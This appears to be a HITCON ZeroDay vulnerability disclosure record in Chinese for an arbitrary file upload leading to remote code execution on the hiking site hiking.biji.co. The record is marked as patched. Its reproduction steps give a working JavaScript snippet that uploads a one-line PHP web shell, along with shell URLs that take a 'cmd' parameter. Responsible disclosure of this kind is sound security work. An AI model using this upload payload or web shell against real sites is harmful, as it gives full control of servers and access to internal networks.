Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00485
- 發信 Vendor: 台灣電腦網路危機處理暨協調中心(TWCERT/CC)
- Title: H2U永悅健康股份有限公司 任意檔案上傳 + 可上傳 PHP 達成 RCE
- Introduction: 任意檔案上傳 + 可上傳 PHP 達成 RCE
處理狀態
目前狀態
公開
Last Update : 2025/08/15
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/05/31 19:07:12 : 新提交 (由 yusheng 更新此狀態)
- 2025/06/02 21:30:54 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 15:50:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 15:50:45 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 15:50:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/07/31 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2025/08/07 14:32:27 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/15 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00485
- 通報者:cat1528985 (yusheng)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
上傳的檔案跟主網站(健行筆記 https://hiking.biji.co/ )在同一個 domain 底下,並且可以上傳 php 達成 RCE
https://hiking.biji.co/uploads/blueimp/2156864/a.php?cmd=ls
https://hiking.biji.co/uploads/blueimp/2156864/a%20%281%29.php?cmd=ls
https://hiking.biji.co/uploads/blueimp/2156864/a.html
https://hiking.biji.co/uploads/blueimp/2156864/a.php?cmd=ls
https://hiking.biji.co/uploads/blueimp/2156864/a%20%281%29.php?cmd=ls
https://hiking.biji.co/uploads/blueimp/2156864/a.html
敘述
重現漏洞方式:
- 免費註冊健行筆記 https://hiking.biji.co/
- 到上傳相片的頁面 https://hiking.biji.co/index.php?q=album&act=upload_photo
- F12 > Console 執行以下程式碼(上傳圖片的API),即可上傳任意檔案到跟主網站同個 domain 底下
const fd = new FormData(); const file = new File(["<?php system($_GET['cmd']); ?>"], "a.php", { type: "text/php" }); fd.append("files", file); fetch("https://hiking.biji.co/blueimp/ajax/upload", { "body": fd, "method": "POST", "mode": "cors", "credentials": "include" });
漏洞的種類:
CWE-434: Unrestricted Upload of File with Dangerous Type
CWE-94: Improper Control of Generation of Code ('Code Injection')
螢幕截圖說明:
經過實測,上傳的 php 檔案確實可以執行
修補建議
上傳圖片的API EndPoint https://hiking.biji.co/blueimp/ajax/upload 實踐嚴格的檔案類型檢查
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。